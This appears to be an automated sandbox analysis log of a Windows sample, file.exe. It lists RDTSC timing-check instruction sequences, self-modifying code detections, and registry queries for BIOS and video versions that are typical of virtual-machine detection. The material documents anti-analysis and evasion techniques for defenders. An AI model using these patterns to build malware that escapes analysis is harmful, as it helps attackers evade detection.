              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02FAB second address: B02FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02FB1 second address: B02FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5444755FA6h 0x0000000a jnp 00007F5444755FA6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02FC6 second address: B02FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A19C second address: B0A1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1A2 second address: B0A1CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5444E6F501h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5444E6F4F6h 0x00000014 jmp 00007F5444E6F4FBh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12190 second address: B121C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5444755FA6h 0x0000000a jnl 00007F5444755FA6h 0x00000010 popad 0x00000011 je 00007F5444755FBFh 0x00000017 jmp 00007F5444755FB7h 0x0000001c push eax 0x0000001d pop eax 0x0000001e jng 00007F5444755FB2h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B103C8 second address: B103D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B103D2 second address: B103D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1096E second address: B10983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F501h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B110F4 second address: B11121 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5444755FB0h 0x0000000c jc 00007F5444755FA6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11121 second address: B1112B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1112B second address: B11143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F5444755FA6h 0x0000000d jmp 00007F5444755FABh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11F64 second address: B11F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FE68 second address: B0FE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B188A4 second address: B188A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2813D second address: B2816C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F5444755FB4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27CF9 second address: B27CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27CFF second address: B27D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27D17 second address: B27D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5444E6F50Fh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B10F second address: B2B113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B113 second address: B2B13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F506h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F5444E6F500h 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD82 second address: B2FD86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD86 second address: B2FD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD8C second address: B2FD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD92 second address: B2FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32280 second address: B32292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5444755FADh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32292 second address: B322C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5444E6F508h 0x00000009 jmp 00007F5444E6F502h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B322C0 second address: B322C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B322C6 second address: B322D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F5444E6F4F6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38295 second address: B3829A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3829A second address: B382A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5444E6F4F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B382A4 second address: B382AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B968 second address: B3B96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B96E second address: B3B988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jnp 00007F5444755FA6h 0x0000000f jmp 00007F5444755FAAh 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45435 second address: B4543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4543B second address: B4547F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB7h 0x00000007 pushad 0x00000008 jng 00007F5444755FA6h 0x0000000e js 00007F5444755FA6h 0x00000014 jnl 00007F5444755FA6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jo 00007F5444755FC0h 0x00000023 jbe 00007F5444755FACh 0x00000029 jg 00007F5444755FA6h 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4547F second address: B45485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43CFC second address: B43D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5444755FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43E9C second address: B43EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F501h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43FDA second address: B43FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F5444755FAAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43FEF second address: B44024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5444E6F501h 0x0000000d push edi 0x0000000e jmp 00007F5444E6F4FEh 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44199 second address: B441A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5444755FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B441A3 second address: B441A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445E8 second address: B445EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445EF second address: B44623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F509h 0x00000007 jmp 00007F5444E6F502h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44623 second address: B44636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F5444755FA6h 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44636 second address: B4463C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4463C second address: B44640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44640 second address: B44644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44644 second address: B4464A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A35F second address: B4A363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A363 second address: B4A367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A367 second address: B4A36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A36D second address: B4A388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F5444755FB4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A388 second address: B4A396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A396 second address: B4A39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DFFA second address: B4DFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DFFE second address: B4E004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E004 second address: B4E013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F5444E6F4F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54184 second address: B54188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55C4E second address: B55C58 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444E6F4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B2C7 second address: B6B2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F5444755FAAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81D98 second address: B81DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5444E6F4FEh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DAB second address: B81DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5444755FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82CF7 second address: B82D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5444E6F4F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D02 second address: B82D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444755FB1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D18 second address: B82D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D1E second address: B82D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB3h 0x00000009 popad 0x0000000a jo 00007F5444755FB1h 0x00000010 jmp 00007F5444755FABh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D4D second address: B82D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84711 second address: B84717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84717 second address: B84722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84722 second address: B84726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84726 second address: B8472A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8472A second address: B84730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84730 second address: B8476A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5444E6F507h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5444E6F505h 0x00000012 jc 00007F5444E6F4F6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C1 second address: 51F02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C5 second address: 51F02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C9 second address: 51F02CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02CF second address: 51F0307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5444E6F4FCh 0x00000013 or eax, 6F477988h 0x00000019 jmp 00007F5444E6F4FBh 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0307 second address: 51F034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5444755FABh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F5444755FABh 0x0000001e jmp 00007F5444755FB8h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F034A second address: 51F037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 jmp 00007F5444E6F4FDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5444E6F508h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F037C second address: 51F0380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0380 second address: 51F0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03D4 second address: 51F03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03DA second address: 51F0404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 mov ecx, 0A38AFC5h 0x00000015 popad 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0404 second address: 51F0408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0408 second address: 51F040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F040E second address: 51F0414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0414 second address: 51F0418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0418 second address: 51F0425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0425 second address: 51F042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 mov cx, dx 0x0000000a rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8EF88C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8EF900 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A956B3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A95ECD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A953C2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB8986 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B1E889 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_3-27317
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_3-27390
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.9 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
